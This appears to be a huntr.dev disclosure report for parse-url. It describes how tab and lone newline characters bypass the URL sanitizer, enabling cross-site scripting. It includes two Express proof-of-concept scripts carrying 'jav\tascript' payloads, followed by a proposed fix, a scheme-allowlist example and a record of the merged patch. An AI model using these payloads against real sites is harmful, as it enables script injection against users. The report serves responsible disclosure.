https://huntr.dev/bounties/582cb14b-b2a8-4064-91c5-b580ff69ba07/ fix bypass; XSS via improper input validation of \t and lone \n character in ionicabizau/parse-url

Valid

Reported on

Jun 7th 2022


Description

I read this report https://huntr.dev/bounties/582cb14b-b2a8-4064-91c5-b580ff69ba07/ and noticed that \t and a lone \n are also missing from the filter list in the URL regex:

replace(/\r?\n|\r/gm, "")

All instances of \r, \n and \t should be cleaned, but the filter list only checks for \r\n or \r. Therefore, someone can still specify a single \n or a single \t, which will not be checked, and bypass the filter.

Proof of Concept

// PoC 1: a tab inside the scheme ("jav\tascript")
const parseUrl = require("parse-url");
const express = require("express");
const app = express();

// The tab is left in the scheme, so `protocol` is not "javascript" and the
// denylist check below lets the href through to the rendered page.
const parsed = parseUrl("jav\tascript://%0aalert(1)");
console.log(parsed);

app.get("/", (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
    }
});

app.listen(9999);

// PoC 2: the same page, with a lone newline inside the scheme ("jav\nascript")
const parseUrl = require("parse-url");
const express = require("express");
const app = express();

const parsed = parseUrl("jav\nascript://%0aalert(1)");
console.log(parsed);

app.get("/", (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
    }
});

app.listen(9999);

Impact

XSS

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 2 months ago
haxatron modified the report 2 months ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 2 months ago
haxatron modified the report 2 months ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 2 months ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days. 2 months ago
Ionică (Maintainer), a month ago

Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.

haxatron (Researcher), a month ago

Hi @maintainer, this can be fixed using the following regex:

url = (url || "").trim().replace(/\r|\n|\t/gm, "");

It deletes all \r, \n and \t in the URL.
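The filter quoted in the report and the proposed replacement side by side, as an added example that is not parse-url's own code: it shows what each filter does to the PoC inputs and pairs the sanitizer with a scheme allowlist rather than the PoC's `protocol !== "javascript"` denylist. `schemeOf()` is a hypothetical stand-in for the parser's protocol field, not parse-url's implementation.

```javascript
// Added example, not parse-url's own code: the sanitizer quoted in the
// report beside the researcher's proposed replacement, and an allowlist
// check on the resulting scheme. schemeOf() is a hypothetical stand-in
// for the parser's "protocol" field, not parse-url's implementation.
const ALLOWED_SCHEMES = new Set(["http", "https"]);

// Filter quoted in the report.
function sanitizeOriginal(url) {
  return (url || "").trim().replace(/\r?\n|\r/gm, "");
}

// Researcher's proposed filter: removes every \r, \n and \t.
function sanitizeProposed(url) {
  return (url || "").trim().replace(/\r|\n|\t/gm, "");
}

// Scheme as a strict parser sees it: scheme characters only, up to "://".
// A control character inside the scheme yields null, which is how a
// `protocol !== "javascript"` test is sidestepped while the browser, which
// removes ASCII tab and newline from the input, still sees "javascript:".
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\//i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// The PoC's denylist check, run after the original filter.
function originalCheckPasses(raw) {
  return schemeOf(sanitizeOriginal(raw)) !== "javascript";
}

// Defender-side check: sanitize, then require a known-good scheme instead
// of rejecting a known-bad one, so an unparseable scheme is refused too.
function isSafeHref(raw, sanitize = sanitizeProposed) {
  const scheme = schemeOf(sanitize(raw));
  return scheme !== null && ALLOWED_SCHEMES.has(scheme);
}
```

The allowlist rejects the tab payload even when paired with the original filter, because an unparseable scheme never reaches the allowed set.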

Ionică Bizău (Johnny B.) validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a a month ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty